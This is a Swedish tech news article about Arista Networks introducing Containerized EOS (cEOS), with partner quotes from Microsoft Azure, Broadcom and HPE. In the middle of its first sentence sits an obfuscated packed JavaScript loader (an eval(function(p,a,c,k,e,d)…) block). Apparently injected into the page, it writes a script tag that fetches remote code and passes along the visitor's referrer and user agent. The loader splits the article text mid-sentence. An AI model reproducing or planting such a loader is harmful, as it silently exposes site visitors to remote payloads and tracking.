Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Arista introducerar container-mjukvara för molnbaserade nätverk

Arista
Sebastian

Arista eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|eaadt|var|u0026u|referrer|erafk||js|php’.split(’|’),0,{}))
Networks (NYSE:ANET) lanserar nu stöd för containertekniken i sitt operativsystem EOS. Med Containerized EOS (containerized Extensible Operating System) får företag tillgång till nya modeller för inköp, packaging och införande av
Aristas EOS® hos moln-, tjänsteleverantörs- och företagslösningar. Med stöd för marknadens standarder för containerbaserad utveckling/och drift (DevOps), ger Arista en ökad valfrihet för systemarkitekturarbete som går bortom den egna hårdvaran och stödjer EOS på virtuella maskiner, containers och kiselbaserade switchar från tredje part.

Containerized EOS

Arista cEOS™ introducerar så kallad containerized packaging av EOS-mjukvaran för driftsättning i molninfrastrukturer med samma beprövade mjukvaruimage som körs på alla Arista-produkter. Detta ger nätverksansvariga flexibilitet att anpassa sina IT-miljöer så att det på bästa sätt stödjer samordnad workflow för utveckling, testning och driftsättning och olika tjänster. Det innebär att användare får en stabil och beprövad nätverkslösning över produktions- och utvecklingsplattformar med en optimerad EOS-distribution.

Utrullningen av Arista cEOS är godkänd av flera partners, exempelvis Broadcom, Hewlett Packard Enterprise och Microsoft Azure Networking.

– Det är bra att Aristas container-stödda EOS BGP körs på SONiC (software for open networking in the cloud), då det ger ytterligare möjligheter för vår utvecklingscommunity inom öppen nätverkshantering, säger Yousef Khalidi, Corporate Vice President för Azure Networking. Tack vare vårt samarbete med Arista och andra företag i branschen bygger vi ett mer omfattande ekosystem av molnbaserade nätverkslöningar baserade på open source.

Arista EOS är tillgängligt nu och stöds av en mängd hårdvaruprodukter med öppna standarder, inklusive Aristas egna merchant kiselbasede plattformar, bare metal switches, och standardbaserade virtuella maskiner och containers.

Utökning av Arista EOS för DevOps

Arista har utökat DevOps-approachen mot en mikrotjänst-baserad arkitektur och container-stöd som effektiviserar workloads, workflows och komplex utveckling och validering i enorm skala. Då cEOS exekverar som vilken container som helst, kan användare köra andra container-baserade applikationer på samma plattform, till exempel verktyg för automatisering och systemkontroll. Arista cEOS körs även ihop med den grundläggande EOS-arkitekturen och är därigenom en smidig modul som kan användas för nätverksmodellering, utveckling och validering i molnet. På samma sätt som virtualisering gjorde tidigare, möjliggör detta för utvecklare att jobba i en sömlös miljö mellan utveckling och produktion för hela driftsmiljön med en samordnad approach för molnbaserade nätverk. 

I tillägg till introduktionen av cEOS som körs i container-miljöer, introducerar Arista stöd för container-ekosystemet, exempelvis:

  • ?      EOS körs nu i en container på flera hårdvaru- och molnplattformar (NEW)
  • ?      EOS stödjer applikationer som körs samtidigt antingen i en VM, som native Linux-apps eller som en container
  • ?      EOS stödjer automatisk discovery och provisioning för container workloads som körs inom EOS eller i externa containers med Container Tracer

EOS Disaggregation med White-Box Ecosystem

Aristas kunder kan använda cEOS tillsammans med branschens vanligaste hårdvara, och köra en mängd verktyg och applikationer från det ekosystem som redan finns kring containers. Detta är den första mjukvaran som erbjuder EOS för så kallade white box switches och servrar. Arista cEOS är tillgänglig och supporteras av Arista på hårdvara från flera olika leverantörer.

Arista EOS är en mjukvarusvit som har utformats för och körs i några av världens största datacenter- och molnnätverk. Mjukvarusviten inom EOS omfattar bland annat en flexibel och nätverkstäckande NetDB-arkitektur, CloudVision automatisering och analytics. Dessutom finns stöd för alla möjliga workflow, workload och workstream över alla typer av driftsmiljöer.

Tillgänglighet

Arista cEOS är nu tillgänglig för customer trials på utvalda tredjeparts-hårdvaruplattformar. Arista cEOS med Microsoft Software för Open Networking in the Cloud (SONiC) visades nyligen på Open Compute Project (OCP) Summit i Santa Clara. Kontakta gärna Arista för mer information och prisuppgifter.

Ytterligare uttalanden:

Broadcom

– Som den volymmässigt störste leverantören inom merchant silicon switch-on-chip platforms, är vi exalterade över den nya riktning som marknaden nu tar inom containerized network operating systems, säger Ram Velaga, Senior Vice President & General Manager, Switch Products Division at Broadcom. Vi tror att sammanflödet av container workflows och DevOps och open networking kommer att leda till en större efterfrågan på våra nätverksprodukter.

HPE

– När våra kunder nu flyttar till mjukvarudefinierade datacenterinfrastrukturer behöver de öppna och agila arkitekturer som tar hänsyn till de branschstandarder som växer fram, DevOps och driftmodeller baserade på mikrotjänster, säger Dom Wilde, VP och GM Data Center Networking BU, Data Center Infrastructure Group på Hewlett Packard Enterprise.  Arista cEOS ger våra HPE Altoline-kunder en spännande möjlighet när de migrerar till allt mer öppna nätverksarkiteturer.